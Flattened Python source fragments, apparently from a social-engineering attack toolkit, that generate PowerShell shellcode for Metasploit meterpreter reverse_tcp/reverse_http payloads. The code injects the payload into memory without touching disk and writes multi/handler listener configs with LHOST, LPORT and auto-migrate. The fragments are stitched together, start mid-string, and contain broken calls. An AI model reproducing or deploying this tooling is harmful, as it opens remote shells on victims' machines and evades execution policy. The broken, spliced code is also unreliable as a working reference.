This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html) """) payload = input('Enter the payload name [or Enter for windows/meterpreter/reverse_http]: ') if payload == '': payload = 'windows/meterpreter/reverse_http' # create base metasploit payload to pass to powershell.prep with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite: filewrite.write(payload) ipaddr = input("Enter the IP of the LHOST: ") port = input("Enter the port for the LHOST: ") shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "") with open(os.path.join(core.setdir + 'x86.powershell'), 'w') as filewrite: filewrite.write(shellcode) time.sleep(3) with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: pass # read in x amount of bytes data_read = int(50) output_variable = "#define __PROG_TYPES_COMPAT__\n#include <avr/pgmspace.h>\n" counter = 0 while True: reading_encoded = fileopen.read(data_read).rstrip() if not reading_encoded:
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk. This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html) """) # define standard metasploit payload payload = "windows/meterpreter/reverse_tcp" # create base metasploit payload to pass to powershell.prep with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite: filewrite.write(payload) ipaddr = input("Enter the IP for the reverse: ") port = input("Enter the port for the reverse: ") shellcode = core.generate_powershell_alphanumeric_payload( payload, ipaddr, port, "") with open(os.path.join(core.setdir + 'x86.powershell', 'w')) as filewrite: filewrite.write(shellcode) time.sleep(3) with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: pass # read in x amount of bytes data_read = int(50) output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n" counter = 0 while True: reading_encoded = fileopen.read(data_read).rstrip() if not reading_encoded:
def prep_powershell_payload(): # grab stage encoding flag stage_encoding = core.check_config("STAGE_ENCODING=").lower() if stage_encoding == "off": stage_encoding = "false" else: stage_encoding = "true" # check to see if we are just generating powershell code powershell_solo = core.check_options("POWERSHELL_SOLO") # check if port is there port = core.check_options("PORT=") # check if we are using auto_migrate auto_migrate = core.check_config("AUTO_MIGRATE=") # check if we are using pyinjection pyinjection = core.check_options("PYINJECTION=") if pyinjection == "ON": # check to ensure that the payload options were specified right if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")): pyinjection = "on" core.print_status("Multi/Pyinjection was specified. Overriding config options.") else: pyinjection = "off" # grab ipaddress if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("Enter the ipaddress for the reverse connection: ") core.update_options("IPADDR=" + ipaddr) # check to see if we are using multi powershell injection multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower() # turn off multi injection if pyinjection is specified if pyinjection == "on": multi_injection = "off" # check what payloads we are using powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=") # if we specified a hostname then default to reverse https/http if not core.validate_ip(ipaddr): powershell_inject_x86 = "windows/meterpreter/reverse_http" # prompt what port to listen on for powershell then make an append to the current # metasploit answer file if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): # if we have multi injection on, don't worry about these if multi_injection != "on" and pyinjection == "off": core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector") port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) if not port: port = "443" with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen: data = fileopen.read() match = re.search(port, data) if not match: with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") filewrite.write("set PAYLOAD {0}\n" "set LHOST {1}\n" "set LPORT {2}\n" "set EnableStageEncoding {3}\n" "set ExitOnSession false\n" "exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding)) # if we have multi injection on, don't worry about these if multi_injection != "on" and pyinjection == "off": # check to see if the meta config multi pyinjector is there if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): if core.check_options("PORT=") != 0: port = core.check_options("PORT=") # if port.options isnt there then prompt else: port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) if not port: port = "443" core.update_options("PORT={0}".format(port)) # turn off multi_injection if we are riding solo from the powershell menu if powershell_solo == "ON": multi_injection = "off" pyinjection = "on" # if we are using multi powershell injection if multi_injection == "on" and pyinjection == "off": core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...") # define a base variable x86 = "" # specify a list we will use for later multi_injection_x86 = "" # here we do some funky loops so we don't need to rewrite the code below if multi_injection == "on": port = core.check_config("POWERSHELL_MULTI_PORTS=") port = port.split(",") if multi_injection == "on": # iterate through the ports, used for POWERSHELL_MULTI_PORTS for ports in port: # dont cycle through if theres a blank if ports: core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports)) multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86) if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports) if not port_check: with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") filewrite.write("set PAYLOAD {0}\n" "set LHOST {1}\n" "set EnableStageEncoding {2}\n" "set LPORT {3}\n" "set ExitOnSession false\n" "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) # if we aren't using multi pyinjector if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): # if meta config isn't created yet then create it if not os.path.isfile(): with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite: filewrite.write("") port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports) if not port_check: with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite: filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") filewrite.write("set PAYLOAD {0}\n" "set LHOST {1}\n" "set EnableStageEncoding {2}\n" "set ExitOnSession false\n" "set LPORT {3}\n" "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) # here we do everything if pyinjection or multi pyinjection was specified if pyinjection == "on": injections = [] # read in the file we need for parsing with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen: payloads = fileopen.read()[:-1].rstrip() # strips an extra , payloads = payloads.split(",") # format: payload<space>port for payload in payloads: # format: payload<space>port payload = payload.split(" ") powershell_inject_x86 = payload[0] port = payload[1] core.print_status("Generating x86-based powershell injection code...") injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)) multi_injection_x86 = ",".join(injections) # if its turned to off if multi_injection == "off" and pyinjection == "off": core.print_status("Generating x86-based powershell injection code...") x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86) # if we are specifying multi powershell injection if multi_injection == "on" or pyinjection == "on": x86 = multi_injection_x86[1:] # remove comma at beginning # check to see if we want to display the powershell command to the user verbose = core.check_config("POWERSHELL_VERBOSE=") if verbose.lower() == "on": core.print_status("Printing the x86 based encoded code...") time.sleep(3) print(x86) with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite: filewrite.write(x86) core.print_status("Finished generating powershell injection bypass.") core.print_status("Encoded to bypass execution restriction policy...")